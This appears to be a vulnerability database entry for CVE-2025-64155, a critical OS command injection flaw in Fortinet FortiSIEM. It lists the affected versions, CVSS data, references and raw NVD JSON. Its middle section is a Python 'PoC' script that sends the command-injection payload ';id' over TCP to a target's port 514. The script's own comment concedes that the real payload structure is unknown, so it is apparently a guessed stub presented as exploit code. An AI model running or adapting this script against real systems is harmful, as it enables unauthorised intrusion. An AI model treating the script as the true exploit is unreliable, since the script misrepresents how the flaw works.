CVE-2025-64155

Description

An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:fortinet:fortisiem:7.4.0:*:*:*:*:*:*:* - VULNERABLE

FortiSIEM 7.4.0

FortiSIEM 7.3.0 - 7.3.4

FortiSIEM 7.1.0 - 7.1.8

FortiSIEM 7.0.0 - 7.0.4

FortiSIEM 6.7.0 - 6.7.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-64155 PoC - FortiSIEM OS Command Injection
Reference: https://github.com/horizon3ai/CVE-2025-64155
Note: This is for educational and authorized testing purposes only
"""

import socket
import sys
import argparse

def exploit_fortisiem(target_ip, target_port=514):
    """
    Exploit CVE-2025-64155 by sending crafted TCP request
    with OS command injection payload
    """
    # Construct malicious payload with command injection
    # The actual payload structure depends on FortiSIEM's TCP service
    payload = b';id\n'  # Simple test payload - inject 'id' command
    
    try:
        print(f'[*] Connecting to {target_ip}:{target_port}')
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        print(f'[*] Sending exploit payload...')
        sock.send(payload)
        
        print(f'[*] Receiving response...')
        response = sock.recv(4096)
        print(f'[+] Response: {response.decode("utf-8", errors="ignore")}')
        
        sock.close()
        return True
        
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-64155 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', type=int, default=514, help='Target port')
    args = parser.parse_args()
    
    exploit_fortisiem(args.target, args.port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64155
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64155
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64155/
[4] VulDB https://vuldb.com/cve/CVE-2025-64155
[5] https://fortiguard.fortinet.com/psirt/FG-IR-25-772
[6] https://github.com/horizon3ai/CVE-2025-64155
[7] https://github.com/purehate/CVE-2025-64155-hunter

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64155", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:58.440", "lastModified": "2026-01-20T16:16:06.200", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests."}, {"lang": "es", "value": "Una vulnerabilidad de neutralización inadecuada de elementos especiales utilizados en un comando de sistema operativo ('inyección de comandos de sistema operativo') en Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 a 7.3.4, FortiSIEM 7.1.0 a 7.1.8, FortiSIEM 7.0.0 a 7.0.4, FortiSIEM 6.7.0 a 6.7.10 puede permitir a un atacante ejecutar código o comandos no autorizados a través de solicitudes TCP manipuladas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7.0", "versionEndExcluding": "7.1.9", "matchCriteriaId": "409EC360-68C2-4098-AC99-8310913D8EC0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.7", "matchCriteriaId": "2A8C7360-73D5-4629-B1C3-47B6C7AD9678"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.0", "versionEndExcluding": "7.3.5", "matchCriteriaId": "C41BBF42-F97A-4358-ADB6-9762BD8F3CAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:7.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "500DAB25-48C9-48C7-B7CD-92C06989F039"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-772", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/horizon3ai/CVE-2025-64155", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/purehate/CVE-2025-64155-hunter", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}